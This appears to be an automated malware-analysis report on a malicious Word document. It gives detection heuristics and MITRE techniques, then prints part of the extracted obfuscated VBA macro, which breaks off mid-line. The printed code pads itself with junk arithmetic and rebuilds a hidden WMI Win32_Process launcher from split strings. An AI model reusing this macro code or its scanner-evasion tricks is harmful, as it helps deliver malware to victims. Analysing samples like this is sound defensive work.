Verdict: MALICIOUS (Risk Score: 342)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1137.001 Office Application Startup: VBA
The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate the use of legacy WordBasic auto-exec markers and of VBA macros that call GetObject and CreateObject to reach the Win32_Process WMI class for process creation. This strongly suggests the macro is designed to execute arbitrary commands, most likely to download and run a secondary payload. String obfuscation and WMI-based process creation are common techniques in malware delivery.
Heuristics (9)

- ClamAV: Doc.Malware.00536d-6861525-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.00536d-6861525-0
- VBA macros detected [medium, 5 related findings, OLE_VBA_MACROS]: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical, OLE_VBA_WMI_PROCESS_CREATE]: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals [critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION]: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: f672b1fbae277ba5de590f7008f9ebd362d4d94a92c3cbcd069e4c2ccd26984e) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 56178 bytes |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "t075439"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "d__631__"
Function B106_01()
If q_399222 <> R__22_ Then
c30__9 = (629167753)
G_37331 = j5__5_3 * 513261520 + V6162_ + CLng(P_19_40)
J93__78 = 180965085 / Hex(n___54 / Chr(w1519__0 - CDate(749198788)) * 542849814 / 114049885) / E561_446 - Fix(921820855)
F07961 = (649676437)
End If
If C_06_31 <> A1259_52 Then
f_26___7 = (731504101)
R7_6__ = Q0_46237 * 853970231 + Y__686 + CLng(p71_51)
i6_0492_ = 178389924 / Hex(n5_82973 / Chr(D3116_8 - CDate(270173622)) * 984620811 / 540898291) / W82_31_ - Fix(840989872)
q03_2_ = (962154173)
End If
If V7669_8_ <> z5582482 Then
r3416_ = (749598159)
Q_2724_8 = z80_351 * 647215821 + n9____ + CLng(S1_25_)
r_4440 = 582900281 / Hex(Z261064 / Chr(D_2303 - CDate(76075812)) * 662267171 / 191563317) / s40_373 - Fix(368797177)
E1265__3 = (651432364)
End If
If f__01_0_ <> z5_449 Then
V293_65_ = (68618296)
z42_7_ = o3_68_49 * 24381070 + q_28_51 + CLng(c52_5___)
a72_687 = 693198085 / Hex(o_5_085 / Chr(G8663571 - CDate(106277152)) * 88908244 / 776591268) / p89_0_0 - Fix(991476360)
w13__63 = (745462232)
End If
If E1___17 <> N__3_29 Then
A648__ = (922412858)
M5775__1 = C_6690_0 * 552738017 + G0901749 + CLng(s04381_0)
u8__691 = 614646956 / Hex(F60_29 / Chr(O6866_31 - CDate(107248950)) * 172397485 / 69431115) / w83_9__5 - Fix(401732153)
m2_7162 = (892381585)
End If
If b____2_ <> m6028_15 Then
t7_4_234 = (25699311)
b16714 = i_491_0_ * 992223476 + d3734287 + CLng(i___045)
b999739 = 857100774 / Hex(H4323_ / Chr(t367_6 - CDate(59589881)) * 927063374 / 940204186) / R069594 - Fix(966450233)
B9493_ = (389376880)
End If
End Function
Function I129_296(c43499_, K_37241_)
On Error Resume Next
If o__76_8 <> R243__91 Then
i_040_ = (320714998)
m_23_6 = f_2__8 * 416133249 + S615047 + CLng(l29301_)
F4_7_9__ = 166330287 / Hex(u44926 / Chr(s1901604 - CDate(581367514)) * 446634761 / 190773311) / V_560_ - Fix(559668078)
l21177_ = (972267945)
End If
If h_07371_ <> w_9317 Then
d3500_7 = (1425210)
v__59__ = d_8___ * 641580448 + m114_7 + CLng(X_10_359)
Q95_7_37 = 796768096 / Hex(V_18542 / Chr(B6__6_2 - CDate(522499492)) * 588954874 / 579732747) / u_5___ - Fix(588702703)
Z04513 = (6328688)
End If
Set a073069 = GetObject(L46__076 + "winmgm" + j_4_48__ + "ts:Win" + "32_Proce" + "ssStartup")
If Q_5812_ <> X38844 Then
q2920_7 = (319996542)
r2_0432 = w2__364 * 636583075 + b4_8_18 + CLng(i1_4203)
n_56208 = 314421928 / Hex(V_63__ / Chr(t810__ - CDate(735937672)) * 441410211 / 579005094) / j311___3 - Fix(99012560)
w8_5_9 = (266948925)
End If
If Q7_09_4_ <> Y_2__9 Then
p__348 = (501967029)
A9_7090 = P_2477 * 991607883 + Q1_8570 + CLng(w3463_)
O5__37 = 855471936 / Hex(G38553 / Chr(J__746 - CDate(799585243)) * 121768186 / 406291824) / o__41330 - Fix(839408902)
i1_168 = (24390989)
End If
If w103___8 <> J__0___ Then
u8_4__92 = (699709800)
b61__2_4 = D624___5 * 738269819 + a_223__4 + CLng(C_53____)
Z9__291_ = 33352908 / Hex(z__10__9 / Chr(w4317_ - CDate(76818577)) * 4420004 / 973848976) / w_7__4_ - Fix(538865725)
L6_21722 = (912913152)
End If
a073069.ShowWindow = 687668 - 687668
If f__181 <> k668_047 Then
P041__8 = (49918165)
M1_832_5 = S__7_5 * 311168717 + V2_2_94 + CLng(G_87460)
t69___0 = 209423656 / Hex(o578766_ / Chr(H__64309 - CDate(887438153)) * 637613229 / 549508609) / s70283 - Fix(952890107)
K8_3061 = (83965521)
End If
If Z8_2_6_2 <> P719606 Then
O__9417 = (217538408)
I75_062_ = U_0___2 * 7927175 + m97___9_ + CLng(V30561)
T340303 = 442057797 / Hex(i5_754 / Chr(A7_0_48 - CDate(102933997)) * 109297979 / 246016745) / V_179_9 - Fix(75640254)
l7_9432_ = (866501615)
End If
If i__6_6 <> E68791__ T
```

... (truncated)